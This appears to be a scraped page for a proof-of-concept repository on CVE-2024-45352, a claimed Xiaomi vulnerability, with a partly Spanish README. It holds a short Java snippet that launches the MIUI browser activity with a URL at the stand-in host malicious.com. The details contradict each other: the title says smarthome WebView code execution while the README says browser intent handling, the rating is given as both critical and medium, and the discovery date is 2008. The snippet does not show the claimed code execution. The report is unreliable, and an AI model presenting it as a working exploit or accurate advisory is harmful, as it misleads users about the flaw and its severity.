CVE-2024-45352 PoC — Xiaomi smarthome application Webview has code execution vulnerability

Source

Associated Vulnerability

Description

Reporte técnico sobre vulnerabilidad crítica de Xiaomi 

Readme

# xiaomi-cve-2024-45352
Reporte técnico sobre vulnerabilidad crítica de Xiaomi 
Vulnerability Summary
A vulnerability was discovered in Xiaomi's default browser (com.android.browser) on various MIUI devices. The app fails to properly validate intents passed via `startActivity`, allowing malicious apps to open arbitrary URLs or perform unintended actions.

- **CVE ID**: CVE-2024-45352
- **Component**
- :com.android.browser
- **Severity**: Medium
- **Status**: Reported to Xiaomi (awaiting confirmation)
- **Date Found**: [24 de abril del 2008]

## 🔥 Proof of Concept (PoC)

1. Create a simple malicious app with the following intent:
```java
Intent intent = new Intent();
intent.setComponent(new ComponentName("com.android.browser", "com.android.browser.BrowserActivity"));
intent.setData(Uri.parse("http://malicious.com"));
startActivity(intent);

File Snapshot

 [4.0K]  /data/pocs/5dd02639c8c8b3cb766ea0adc289f411c3f6d5a2
├── [  30]  CVE-2024-45352-Reporte-Tecnico.pdf
├── [1.0K]  LICENSE
└── [ 856]  README.md

0 directories, 3 files

Remarks